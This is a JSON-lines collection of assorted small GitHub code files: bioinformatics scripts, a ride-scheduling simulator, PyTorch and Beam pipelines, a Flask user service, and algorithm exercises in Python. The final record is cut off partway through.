+{"seq_id":"3619683806","text":"#!/usr/bin/python\nimport os\nimport sys\nimport glob\nfrom string import atof\n\nbenchmarkpos = [8,2,4,16,55,7,53,18,15,17,19,42]\ninfile = open('data/Hit2result','r')\nphash = {}\nphash_A = {}\nfor line in infile.xreadlines():\n if 'Mut' in line: continue\n line = line.rstrip().rsplit(\"\\t\")\n mut = line[0]\n fit = line[-1]\n pos = int(mut[1:-1])+1\n aa = mut[-1]\n wta = mut[0]\n if pos in benchmarkpos: \n phash[str(pos)+aa] = atof(fit)\n phash[str(pos)+wta] = atof(0)\n if aa == 'A':\n phash_A[str(pos)] = atof(fit)\ninfile.close()\n\naas = ['E','D','R','K','H','Q','N','S','T','P','G','C','A','V','I','L','M','F','Y','W']\noutfile = open('data/BetaBenchMark','w')\noutfile.write('aa'+\"\\t\"+\"\\t\".join(map(str,benchmarkpos))+\"\\n\")\nfor aa in aas:\n outfile.write(aa)\n for pos in benchmarkpos:\n pos = str(pos)\n outfile.write(\"\\t\"+str(phash[pos+aa]-phash_A[pos]))\n outfile.write(\"\\n\")\noutfile.close()\n","repo_name":"wchnicholas/DoubleMutFit2DDG","sub_path":"script/Analyze7.py","file_name":"Analyze7.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74234695146","text":"from collections import namedtuple\nfrom heur import *\n\nPoint = namedtuple(\"Point\", [\"row\", \"column\"])\n\n\nclass Vehicle:\n def __init__(self):\n self.initial_pos = Point(0,0)\n self.scheduled_rides = []\n self.unavailable_until = 0\n self.id = None\n self.never_possible = False\n self.wagi =[]\n self.current_pos = self.initial_pos\n\n\nclass Ride:\n def __init__(self, id, start_pos, end_pos, earliest_start, latest_finish):\n self.id = id\n self.start_pos = start_pos\n self.end_pos = end_pos\n self.earliest_start = earliest_start\n self.latest_finish = latest_finish\n self.available = True\n self.wage = None\n\n\nclass Simulator:\n def __init__(self, vehicles, rides, bonus, steps):\n self.vehicles = vehicles\n self.rides = rides\n self.bonus = bonus\n self.steps = steps\n\n def RidesWages(self):\n for ride in self.rides:\n mins =[]\n for ride2 in self.rides:\n if ride.id != ride2.id:\n mins.append(abs(ride.end_pos.row - ride2.start_pos.row) + abs(ride.end_pos.column - ride2.start_pos.column))\n ride.wage = min(mins)\n print(ride.id, ride.wage)\n\n def daniel_simulate(self):\n score = 0\n step = 0\n self.RidesWages()\n while step < self.steps:\n\n if GetAllAvailableVehicles(self.vehicles,step) == []:\n possibleDate = GetDateOfNextAvailable(self.vehicles)\n if possibleDate: step = possibleDate\n else: return score\n\n print(step, 'score:',score)\n\n for vehicle in self.vehicles:\n vehicle.wagi = []\n if vehicle.unavailable_until <= step:\n for ride in self.rides:\n if ride.available:\n if IsRidePossible(\n vehicle.current_pos.row, vehicle.current_pos.column,\n ride.start_pos.row, ride.start_pos.column, \n ride.end_pos.row, ride.end_pos.column,\n ride.latest_finish, step):\n\n pts, realpoints, finish_time_ride = CalculatePoints(\n ride.start_pos.row, ride.start_pos.column,\n ride.end_pos.row, ride.end_pos.column,\n vehicle.current_pos.row, vehicle.current_pos.column,\n step, ride.earliest_start,self.bonus,ride.wage,step, ride.id,score)\n vehicle.wagi.append({'id':ride.id, 'pts':pts, 'realpts':realpoints,'finish':finish_time_ride})\n \n max_ride = max(vehicle.wagi, key=lambda it: it['pts'], default=None)\n if max_ride:\n picked_ride = self.rides[max_ride['id']]\n score += max_ride['realpts']\n print('assigned', picked_ride.id)\n vehicle.scheduled_rides.append(picked_ride)\n picked_ride.available = False\n vehicle.unavailable_until = max_ride['finish']\n vehicle.current_pos= Point(picked_ride.end_pos.row, picked_ride.end_pos.column)\n else: vehicle.never_possible = True\n\n step+=1\n return score\n\n","repo_name":"NieeFlatmap/2018-self-driving-cars","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19224239152","text":"import pandas as pd\nimport numpy as np\nlst = {\"10,33\",\"30,33\"}\nprint(lst)\ndf = pd.DataFrame(lst)\n\n# print(df.iloc[:])\n# print(df.iloc[:,0])\n\ndf.iloc[:,0] = df.iloc[:,0].str.replace(',','')\nprint(df)","repo_name":"Arwen0905/Python_Test","sub_path":"TQC_考題練習_第二類/a0720_replace_排除數字逗號.py","file_name":"a0720_replace_排除數字逗號.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14443272628","text":"import random\nfrom random import Random\nimport constant as const\n\nimport numpy as np\nimport torch\nimport cv2\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import datasets as dset\nimport torchvision.transforms as T\n\n\ndef get_train_validation_loader():\n train_dataset = dset.ImageFolder(root='./flatfish_train')\n val_dataset = dset.ImageFolder(root='./flatfish_val')\n\n train_dataset = FlatfishTrain(train_dataset, num_train=const.NUM_TRAIN)\n # val_dataset = FlatfishTrain(val_dataset, num_train=const.NUM_VAL)\n val_dataset = FlatfishTest(val_dataset)\n\n train_loader = DataLoader(train_dataset, batch_size=const.BATCH_SIZE, shuffle=True)\n val_loader = DataLoader(val_dataset, batch_size=const.BATCH_SIZE, shuffle=True)\n\n return train_loader, val_loader\n\ndef get_test_loader():\n test_dataset = dset.ImageFolder(root='./flatfish_test')\n\n test_dataset = FlatfishTest(test_dataset)\n # test_dataset = FlatfishTrain(test_dataset, num_train=const.NUM_TEST)\n\n test_loader = DataLoader(test_dataset, batch_size=const.BATCH_SIZE, shuffle=True)\n\n return test_loader\n\nclass FlatfishTrain(Dataset):\n def __init__(self, dataset, num_train):\n self.dataset = dataset\n self.num_train = num_train\n\n def __len__(self):\n return self.num_train\n\n def __getitem__(self, index):\n # Get image from same class\n # : 홀수번째 데이터는 같은 클래스의 이미지\n if index % 2 == 1:\n # 같으면 Label=1\n label = 1.0\n # ['sea', 'farm'] 중 랜덤으로 하나 선택 (0:farm / 1:sea)\n idx = random.randint(0, len(self.dataset.classes) - 1)\n # 선택한 class의 이미지 데이터(주소) 리스트\n image_list = [x for x in self.dataset.imgs if x[1] == idx]\n # 선택한 class의 이미지 리스트 중 2개의 이미지 선택\n image1 = random.choice(image_list)\n image2 = random.choice(image_list)\n # *2개의 이미지가 같으면 두번째 이미지를 다시 선택\n while image1[0] == image2[0]:\n image2 = random.choice(image_list)\n\n # Get image from different class\n # : 짝수번째 데이터는 다른 클래스의 이미지\n else:\n # 다르면 Label=0\n label = 0.0\n # 랜덤으로 2개의 이미지 선택\n image1 = random.choice(self.dataset.imgs)\n image2 = random.choice(self.dataset.imgs)\n # *2개의 이미지의 레이블이 같으면 두번째 이미지를 다시 선택\n while image1[1] == image2[1]:\n image2 = random.choice(self.dataset.imgs)\n\n # 이미지를 넘파이 형태로 로드 후 Tensor로 변환 및 1@105x105사이즈로 resize\n image1 = cv2.imread(image1[0], cv2.IMREAD_GRAYSCALE)\n image2 = cv2.imread(image2[0], cv2.IMREAD_GRAYSCALE)\n label = torch.from_numpy(np.array(label, dtype=np.float32))\n\n image1 = torch.tensor(image1).resize(1, 105, 105).type(torch.FloatTensor)\n image2 = torch.tensor(image2).resize(1, 105, 105).type(torch.FloatTensor)\n label = torch.tensor(label)\n\n return image1, image2, label\n\nclass FlatfishTest:\n def __init__(self, dataset, trials=2, way=4, seed=0):\n self.dataset = dataset\n self.trials = trials\n self.way = way\n self.seed = seed\n self.num_test = len(dataset)*2\n # self.image1 = None\n\n def __len__(self):\n # return self.trials * self.way\n return self.num_test\n\n def __getitem__(self, index):\n rand = Random(self.seed + index)\n # get image pair from same class\n if index < len(self.dataset):\n image1 = self.dataset.imgs[0]\n image2 = self.dataset.imgs[index]\n else:\n image1 = self.dataset.imgs[5]\n image2 = self.dataset.imgs[index - len(self.dataset)]\n\n if image1[1]==image2[1]:\n label = 1.0\n else:\n label = 0.0\n\n # if index % self.way == 0:\n # label = 1.0\n # idx = rand.randint(0, len(self.dataset.classes) - 1)\n # image_list = [x for x in self.dataset.imgs if x[1] == idx]\n # self.image1 = rand.choice(image_list)\n # image2 = rand.choice(image_list)\n # while self.image1[0] == image2[0]:\n # image2 = rand.choice(image_list)\n\n # # get image pair from different class\n # else:\n # label = 0.0\n # image2 = random.choice(self.dataset.imgs)\n # while self.image1[1] == image2[1]:\n # image2 = random.choice(self.dataset.imgs)\n \n image1 = cv2.imread(image1[0], cv2.IMREAD_GRAYSCALE)\n image2 = cv2.imread(image2[0], cv2.IMREAD_GRAYSCALE)\n label = torch.from_numpy(np.array(label, dtype=np.float32))\n\n image1 = torch.tensor(image1).resize(1, 105, 105).type(torch.FloatTensor)\n image2 = torch.tensor(image2).resize(1, 105, 105).type(torch.FloatTensor)\n label = torch.tensor(label)\n\n return image1, image2, label\n\nif __name__=='__main__':\n # train, val = get_train_validation_loader()\n # test = get_test_loader()\n\n # print(len(train.dataset))\n # print(len(val.dataset))\n # print(len(test.dataset))\n\n # print(train.dataset.dataset.classes)\n\n # val_dataset = dset.ImageFolder(root='/Users/hyojin/Fish_Siamese/hyojin2/flatfish_val')\n # val_dataset = FlatfishTrain(val_dataset, num_train=25)\n # img = cv2.imread(train_dataset.imgs[0][0], cv2.IMREAD_GRAYSCALE)\n # img = torch.tensor(img).resize(1, 105, 105)\n # print(img)\n # print(val_dataset[-1])\n testloader = get_test_loader()\n print(len(testloader.dataset))","repo_name":"JONHYOJIN/Fish_Siamese_hyojin","sub_path":"hyojin2/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4207214621","text":"from gevent import monkey\nmonkey.patch_all()\n\nimport signal\nimport os\nimport requests\n\nfrom ping3 import ping\nfrom flask import Flask, send_file\nfrom werkzeug.utils import secure_filename\nfrom flask_restful import Api, Resource, reqparse, request\nfrom pony.orm import db_session\n\nimport gevent\n\nfrom utilities.models import User, Printing\nfrom utilities.config import config\n\nimport logging\nlog = logging.getLogger('werkzeug')\nlog.setLevel(logging.ERROR)\n\napp = Flask(__name__)\napi = Api(app)\n\napp.config['MAX_CONTENT_LENGTH'] = 16 * 1000 * 1000\napp.config['UPLOAD_FOLDER'] = os.path.join('data', 'uploads')\n\n@app.route('/')\ndef default():\n return 'Hello, World!'\n\n\ndef rpc_method_user(method):\n method.rpc = True\n method.permission = 'user'\n return method\n\n\n@api.resource('/login')\nclass UserLogin(Resource):\n def __init__(self):\n super().__init__()\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('username', location='form')\n self.parser.add_argument('password', location='form')\n\n @db_session\n def post(self):\n # Get username and password from request\n args = self.parser.parse_args()\n username = args['username'] or \"\"\n password = args['password'] or \"\"\n user = User.select(lambda u: u.username == username).first()\n\n if not user:\n return {'error': 'User not found'}, 404\n elif not user.verify_password(password):\n return {'error': 'Incorrect password'}, 401\n elif not os.path.exists(os.path.join('data', 'configs', f'{username}.conf')):\n return {'error': 'User configuration not found'}, 404\n\n # TODO: Return VPN configurations\n return send_file(os.path.join('..', '..', 'data', 'configs', f'{username}.conf'))\n\n\n@api.resource('/print')\nclass Print(Resource):\n @db_session\n def post(self):\n ip = request.remote_addr\n user = User.select(lambda u: u.ip_address == ip).first()\n if not user:\n return {'error': 'User not found'}, 404\n\n file = request.files['file']\n if file.filename == '':\n return {'error': 'No file selected'}, 400\n\n if file:\n filename = f'{user.username}_{secure_filename(file.filename)}'\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n Printing(caller=user, source=filename)\n service_address = config['services']['PrintingService'][0]\n r = requests.post(f'http://{service_address[0]}:{service_address[1]}/print',\n files={'file': open(os.path.join(app.config['UPLOAD_FOLDER'], filename), 'rb')}, timeout=5)\n return {'success': True}, 200\n else:\n return {'error': 'No file selected'}, 400\n\n\n@api.resource('/performance')\nclass Performance(Resource):\n def __init__(self):\n super().__init__()\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('cpu', location='form')\n self.parser.add_argument('mem', location='form')\n\n @db_session\n def post(self):\n ip = request.remote_addr\n user = User.select(lambda u: u.ip_address == ip).first()\n if not user:\n return {'error': 'User not found'}, 404\n\n args = self.parser.parse_args()\n cpu = args['cpu'] or \"\"\n mem = args['mem'] or \"\"\n user.cpu = cpu\n user.ram = mem\n return {'success': True}, 200\n\n\ndef ping_users():\n while True:\n with db_session:\n users = User.select()\n batch_size = 5\n batch = []\n for i in range(0, len(users), batch_size):\n # Create a gevnet batch\n batch.append(gevent.spawn(ping_batch, users[i:i + batch_size]))\n gevent.joinall(batch)\n print(\"DONE\")\n\n\ndef ping_batch(batch):\n with db_session:\n for user in batch:\n try:\n ping_ = ping(user.ip_address)\n except:\n ping_ = False\n if not ping_:\n user.is_online = False\n user.ping = -1.0\n else:\n user.is_online = True\n user.ping = round(ping_ * 1000.0, 2)\n\n\n@api.resource('/user/')\nclass UserInfo(Resource):\n def __init__(self):\n super().__init__()\n\n def get(self, username):\n with db_session:\n user = User.select(lambda u: u.username == username).first()\n if not user:\n return {'error': 'User not found'}, 404\n return {'username': user.username, 'ip_address': user.ip_address, 'is_online': user.is_online}, 200\n\n\ndef exit():\n os._exit(0)\n\n\nping_thread = None\ngevent.signal_handler(signal.SIGINT, exit)\n\ndef main():\n global ping_thread\n ping_thread = gevent.spawn(ping_users)\n","repo_name":"VNOI-Admin/utilities","sub_path":"utilities/services/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17741632201","text":"# Diseñar 3 funciones:\r\n#\r\n# 1. Leer un número de 4 dígitos, mostrar el dígito mayor e informar si es par o impar. #!SOLUCIONADO!\r\n# 2. Leer dos números de 3 dígitos cada uno, formar un tercer número con el mayor del primero y el menor del segundo. #!SOLUCIONADO!\r\n# 3. Leer un número de 3 dígitos y formar el mayor número posible con sus cifras.#!SOLUCIONADO\r\n#\r\n# Crea la función principal como un menú con las tres opciones.\r\n\r\ndef menu():\r\n while True:\r\n decision = int(input(\"**** Hola! ingrese en el menú, la opción que quiere realizar ****\\n1.Mostrar mayor par/impar\\n2.seleccione el mayor de los dos numeros\\n3.Ordenar por mayor\\n4.Salir\\n\"))\r\n if decision == 1:\r\n funcion1()\r\n if decision == 2:\r\n funcion2()\r\n if decision == 3:\r\n funcion3()\r\n if decision == 4:\r\n break\r\n\r\ndef funcion1():\r\n numeros=[]\r\n i=0\r\n for i in range(4):\r\n num = float(input(\"Ingerse el numero #{}: \".format(i+1))) #captura los numeros\r\n numeros.append(num) #*Append agrega los # al array\r\n mayor = numeros[0] #*Se le asigna como mayor al primer valor de la lista\r\n for numero in numeros: #se recorre la lista | for in :\r\n if numero > mayor:\r\n mayor = numero\r\n if mayor % 2 == 0:\r\n print(\"El digito Mayor es: \",mayor,\", y el numero es par\")\r\n else:\r\n print(\"El digito Mayor es: \",mayor,\", y el numero es impar\")\r\n\r\ndef funcion2():\r\n numeros=[]\r\n i=0\r\n for i in range(3):#3 digitos, cuenta de 0 a 3\r\n num = float(input(\"Ingerse el numero #{}: \".format(i+1))) #captura los numeros\r\n numeros.append(num) #*Append agrega los # al array\r\n mayor = numeros[0] #*Se le asigna como mayor al primer valor de la lista\r\n menor = numeros[0] #*Se le asigna como mayor al primer valor de la lista\r\n for numero in numeros: #se recorre la lista | for in :\r\n if numero > mayor:\r\n mayor = numero\r\n for numero in numeros: #se recorre la lista | for in :\r\n if numero < menor:\r\n menor = numero\r\n print(f\"El numero mayor es {mayor}, el numero menor es {menor} y juntos son: %i%i\" % (mayor,menor))\r\n\r\ndef funcion3():\r\n numeros=[]\r\n ordenados=[]\r\n i=0\r\n for i in range(3):#3 digitos, cuenta de 0 a 3\r\n num = float(input(\"Ingerse el numero #{}: \".format(i+1))) #captura los numeros\r\n numeros.append(num) #*Append agrega los # al array\r\n ordenados = sorted(numeros, reverse=True)\r\n print(\"El mayor numero posible es %i%i%i\" % (ordenados[0],ordenados[1],ordenados[2]))\r\n\r\nif __name__ == \"__main__\":\r\n menu()\r\n\r\n","repo_name":"paradahuninorte/MisionTIC","sub_path":"Ciclo 1/Componente Practico/Tema 2/sesion6/sesion6.py","file_name":"sesion6.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17753247621","text":"import matplotlib.pyplot as plt\nfrom scipy.io import wavfile\nimport os\nfrom pydub import AudioSegment\n\n# Calculate and plot spectrogram for a wav audio file\ndef gen_spectrogram(wav_file):\n\n rate, data = wavfile.read(wav_file)\n\n nfft = 200 # Length of each window segment\n fs = 8000 # Sampling frequencies\n noverlap = 120 # Overlap between windows\n\n nchannels = data.ndim\n\n if nchannels == 1:\n pxx, freqs, bins, im = plt.specgram(data, nfft, fs, noverlap = noverlap)\n elif nchannels == 2:\n pxx, freqs, bins, im = plt.specgram(data[:,0], nfft, fs, noverlap = noverlap)\n return pxx\n\n# Load raw audio files for speech synthesis\ndef load_raw_audio():\n\n trigger_words = []\n backgrounds = []\n non_trigger_words = []\n\n for filename in os.listdir(\"./data/raw/trigger_words\"):\n if filename.endswith(\"wav\"):\n trigger_word = AudioSegment.from_wav(\"./data/raw/trigger_words/\"+filename)\n trigger_words.append(trigger_word)\n\n for filename in os.listdir(\"./data/raw/backgrounds\"):\n if filename.endswith(\"wav\"):\n background = AudioSegment.from_wav(\"./data/raw/backgrounds/\"+filename)\n backgrounds.append(background)\n\n for filename in os.listdir(\"./data/raw/non_trigger_words\"):\n if filename.endswith(\"wav\"):\n non_trigger_word = AudioSegment.from_wav(\"./data/raw/non_trigger_words/\"+filename)\n non_trigger_words.append(non_trigger_word)\n\n return trigger_words, non_trigger_words, backgrounds\n","repo_name":"shbv/natural_language_processing","sub_path":"trigger_word_detection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16864950598","text":"from typing import List\nfrom CreateTree import TreeNode\n\nclass Solution:\n def isUnivalTree(self, root: TreeNode) -> bool:\n # 前序遍历\n if not root:\n return False\n self.val = root.val\n self.flag = True\n def preorder(root: TreeNode):\n if not root:\n return\n if self.flag == False: # 已经找到不一样的值, 无需再递归了\n return\n if root.val != self.val: # 找到不一样的值, 改变flag\n self.flag = False\n return\n preorder(root.left)\n preorder(root.right)\n\n preorder(root)\n return self.flag","repo_name":"tangxyw/LeetCode","sub_path":"python/BinaryTree/[965]单值二叉树.py","file_name":"[965]单值二叉树.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9967911650","text":"'''386. Lexicographical Numbers\nGiven an integer n, return all the numbers in the range [1, n] sorted in lexicographical order.\nYou must write an algorithm that runs in O(n) time and uses O(1) extra space.\nExample 1:\n\nInput: n = 13\nOutput: [1,10,11,12,13,2,3,4,5,6,7,8,9]\nExample 2:\n\nInput: n = 2\nOutput: [1,2]\n'''\nnum=int(input(\"enter max number:\"))\nlist1=[x for x in range(1,num)]\nlst2=[]\nfor i in list1:\n b=str(i)\n lst2.append(b)\nlst2=sorted(lst2)\n\nlst3=[]\nfor j in lst2:\n c=int(j)\n lst3.append(c)\nprint(f'Lexicographical Numbers:\\n{lst3}')","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/harsha_tasks/_30_dec/standout_30_dec.py","file_name":"standout_30_dec.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73097585068","text":"def anagram(str1, str2):\n str1_list = list(str1)\n str1_list.sort()\n\n str2_list = list(str2)\n str2_list.sort()\n\n return str1_list == str2_list\n\n\nif anagram(input(), input()):\n print('YES')\nelse:\n print('NO')","repo_name":"Coobeliues/pp2_py","sub_path":"pract/pr2/n.py","file_name":"n.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11057913098","text":"import json\nimport datetime\nimport argparse\nimport time\n\nimport apache_beam as beam\nfrom apache_beam.io import ReadFromText\nfrom apache_beam.io import WriteToBigQuery, WriteToText\nfrom apache_beam.metrics import Metrics\nfrom apache_beam.metrics.metric import MetricsFilter\nfrom apache_beam.io.gcp.bigquery import parse_table_schema_from_json\nfrom multiprocessing.dummy import Pool\n\nfrom pardo.parse_row_ndjson import ParseRowNdjsonFn\nfrom pardo.validate_row import ValidateRowFn\n\ndef get_current_time_millis():\n return int(round(time.time() * 1000))\n\ndef run(attributes, options):\n\n runner = str(options['runner'])\n input_source = attributes['input_source']\n notification_time = attributes['notified_at']\n upload_time = attributes['uploaded_at']\n partition_time = attributes['partitioned_at']\n destination = '{}:{}.{}'.format(options['project_id'], options['destination_dataset'], attributes['destination_table'])\n pipeline_params = []\n invalid_data_gcs_dir = attributes['invalid_data_gcs_dir']\n\n if runner == 'DataFlowRunner':\n pipeline_params = [\n '--project', options['project_id'],\n '--temp_location', options['temp_location'],\n '--job_name', '{}-{}'.format(attributes['destination_table'].replace('_','-'), attributes['job_id']),\n '--setup_file', options['setup_file']\n ]\n \n p = beam.Pipeline(runner=runner, argv=pipeline_params)\n input_coll = p | 'read_file_{}'.format(input_source) >> ReadFromText(input_source) \n \n if '.ndjson' in input_source:\n parsed_coll = input_coll | 'parse_elements_(ndjson)' >> beam.ParDo(\n ParseRowNdjsonFn(), input_source, notification_time, upload_time, partition_time, \n to_validation_step=False if attributes['schema'] is None else True\n )\n \n # else\n # parse csv data \n\n if attributes['schema'] is None:\n parsed_coll | 'write_to_BQ_without_validation' >> beam.io.WriteToBigQuery(\n destination,\n write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND)\n else:\n valid_coll, invalid_coll = parsed_coll | 'validate_rows' >> beam.ParDo(\n ValidateRowFn(attributes['schema'])).with_outputs('invalid_coll', main='valid_coll'\n )\n \n valid_coll | 'write_valid_coll_to_BQ' >> beam.io.WriteToBigQuery(\n destination,\n write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND)\n\n invalid_coll | 'write_invalid_coll_to_GCS' >> beam.io.WriteToText(invalid_data_gcs_dir, file_name_suffix='.ndjson')\n\n p.run()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--params',\n dest='params',\n required=True,\n help='Parameters for pipelines')\n args = parser.parse_args()\n params = json.loads(args.params)\n run(attributes=params, options=params['options'])\n ","repo_name":"aliarham11/pipeline-api","sub_path":"pipeline_api/pipelines/data_lake_sink/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39865943547","text":"#Karla Ivonne Serrano Arevalo\n#Ejerercicio 1\n#25 noviembre 2016\n\nfrom PIL import Image, ImageDraw\nimport random\nimport math\n \ndef distance(p1, p2):\n return ((p2[0] - p1[0])**2 + (p2[1] - p1[1])**2)**0.5\n \ndef midPointAdjust(p1, p2, r, size):\n return ( int((p1[0] + p2[0])/r) + size[0]//6 , int((p1[1] + p2[1])/r) + size[1]//6 )\n \ndef midPoint(p1, p2, r, size):\n return ( int((p1[0] + p2[0])/r), int((p1[1] + p2[1])/r))\n \n\nn = 9\nr = 3\nbase = 800\npoints = 1000000\n \n\nwhite = (255, 255, 255)\ncolor = (255, 0, 0)\n \n\nif n == 3:\n size = base, int(3**.5 / 2 * base)\n redCorner = (size[0]//2, 5)\n blueCorner = (5, size[1]-5)\n greenCorner = (size[0]-5, size[1]-5)\n corners = (redCorner, blueCorner, greenCorner)\n \nelif n >= 4:\n \n size = base, base\n radious = base\n angle = 2 * math.pi / n\n corners = [ ( int(size[0]//2 + radious * math.sin(i * angle)), int(size[1]//2 + radious * math.cos(i * angle)) ) for i in range(n) ]\n \n\npolygonImg = Image.new('RGB', size, (0,0,0))\ndraw = ImageDraw.Draw(polygonImg)\n \n\ncurrent = corners[ random.randint(0,len(corners)-1) ]\nfor i in range(points):\n randCorner = corners[ random.randint(0,len(corners)-1) ]\n if n == 3:\n current = midPoint(current, randCorner, r, size)\n else:\n current = midPointAdjust(current, randCorner, r, size)\n draw.point(current, color)\n \npolygonImg.show()\n#polygonImg.save(\"fractal.png\")\n","repo_name":"KarlaISA/Programacion","sub_path":"Laboratorio2/ejercicio5.py","file_name":"ejercicio5.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42318190430","text":"from collections import deque\n\n\ndef dfs(x, y, cnt):\n global step\n if cnt > step:\n return\n if x == n - 1 and y == m - 1:\n step = min(step, cnt)\n else:\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m:\n if not visited[nx][ny] and d[nx][ny] == 1:\n visited[nx][ny] = True\n dfs(nx, ny, cnt + 1)\n visited[nx][ny] = False\n\n'''\ndef bfs(cnt):\n global step\n visited[0][0] = True\n queue = deque([(0, 0)])\n check = -1\n while queue:\n if check > 0:\n cnt -= check\n check = -1\n x, y = queue.popleft()\n if x == n - 1 and y == m - 1:\n step = cnt\n break\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m:\n if not visited[nx][ny] and d[nx][ny] == 1:\n visited[nx][ny] = True\n cnt += 1\n check += 1\n queue.append((nx, ny))\n'''\n\n\nn, m = map(int, input().split())\nd = []\nfor _ in range(n):\n d.append(list(map(int, input())))\n\nstep = 1e9\nvisited = [[False] * m for _ in range(n)]\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n#'''\nvisited[0][0] = True\ndfs(0, 0, 1)\n#'''\n'''\nbfs(1)\n'''\nprint(step)\n","repo_name":"castle-joooun/algorithm_python","sub_path":"Backjoon/dfs, bfs/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36465089525","text":"#\n# * Core 87, Alphanumerica Less\n# * Medium\n\n# * An alphanumeric ordering of strings is defined as follows: each string is \n# * considered as a sequence of tokens, where each token is a letter or a number \n# * (as opposed to an isolated digit, as is the case in lexicographic ordering). \n# * For example, the tokens of the string \"ab01c004\" are [a, b, 01, c, 004]. In \n# * order to compare two strings, we'll first break them down into tokens and \n# * then compare the corresponding pairs of tokens with each other (i.e. compare \n# * the first token of the first string with the first token of the second string, \n# * etc).\n\n# Here is how tokens are compared:\n\n# If a letter is compared with another letter, the usual alphabetical order \n# applies.\n# A number is always considered less than a letter.\n# When two numbers are compared, their values are compared. Leading zeros, if \n# any, are ignored.\n\n# If at some point one string has no more tokens left while the other one still \n# does, the one with fewer tokens is considered smaller.\n\n# If the two strings s1 and s2 appear to be equal, consider the smallest index i \n# such that tokens(s1)[i] and tokens(s2)[i] (where tokens(s)[i] is the ith token \n# of string s) differ only by the number of leading zeros. If no such i exists, \n# the strings are indeed equal. Otherwise, the string whose ith token has more \n# leading zeros is considered smaller.\n\n# Here are some examples of comparing strings using alphanumeric ordering.\n\n# \"a\" < \"a1\" < \"ab\"\n# \"ab42\" < \"ab000144\" < \"ab00144\" < \"ab144\" < \"ab000144x\"\n# \"x11y012\" < \"x011y13\"\n\n# Your task is to return true if s1 is strictly less than s2, and false otherwise.\n\n# Example\n\n# For s1 = \"a\" and s2 = \"a1\", the output should be alphanumericLess(s1, s2) \n# = true;\n\n# These strings have equal first tokens, but since s1 has fewer tokens than \n# s2, it's considered smaller.\n\n# For s1 = \"ab\" and s2 = \"a1\", the output should be alphanumericLess(s1, s2) \n# = false;\n\n# These strings also have equal first tokens, but since numbers are considered \n# less than letters, s1 is larger.\n\n# For s1 = \"b\" and s2 = \"a1\", the output should be alphanumericLess(s1, s2) \n# = false.\n\n# Since b is greater than a, s1 is larger.\n\n# Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] string s1\n\n# A string consisting of English letters and digits.\n\n# Guaranteed constraints:\n# 1 ≤ s1.length ≤ 20.\n\n# [input] string s2\n\n# A string consisting of English letters and digits.\n\n# Guaranteed constraints:\n# 1 ≤ s2.length ≤ 20.\n\n# [output] boolean\n\n# true if s1 is alphanumerically strictly less than s2, false otherwise.\n\n#%%\n\n# * Solution 1\n# ! Bad idea\ndef alphanumericLess1(s1: str, s2: str) -> bool:\n n1 = len(s1)\n n2 = len(s2)\n i1 = 0\n i2 = 0\n while i1 < n1 and i2 < n2:\n # * both are digit\n if s1[i1].isdigit() and s2[i2].isdigit():\n j1 = i1\n j2 = i2\n n1str = ''\n n2str = ''\n while i1 < n1 and s1[i1].isdigit():\n n1str += s1[i1]\n i1 += 1\n while i2 < n2 and s2[i2].isdigit():\n n2str += s2[i2]\n i2 += 1\n if int(n1str) > int(n2str):\n return False\n elif int(n1str) == int(n2str):\n if (i1 - j1) <= (i2 - j2):\n return False\n \n else:\n if s1[i1] > s2[i2]:\n return False\n else:\n i1 += 1\n i2 += 1\n\n return n1 <= n2\n\n\n# * Solution 2\ndef alphanumericLess(s1: str, s2: str) -> bool:\n token1 = []\n token2 = []\n n1 = len(s1)\n n2 = len(s2)\n\n # * get token 1\n i = 0\n while i < n1:\n c = s1[i]\n if c.isdigit():\n numStr = ''\n while i < n1 and s1[i].isdigit():\n numStr += s1[i]\n i += 1\n token1.append(numStr)\n else:\n 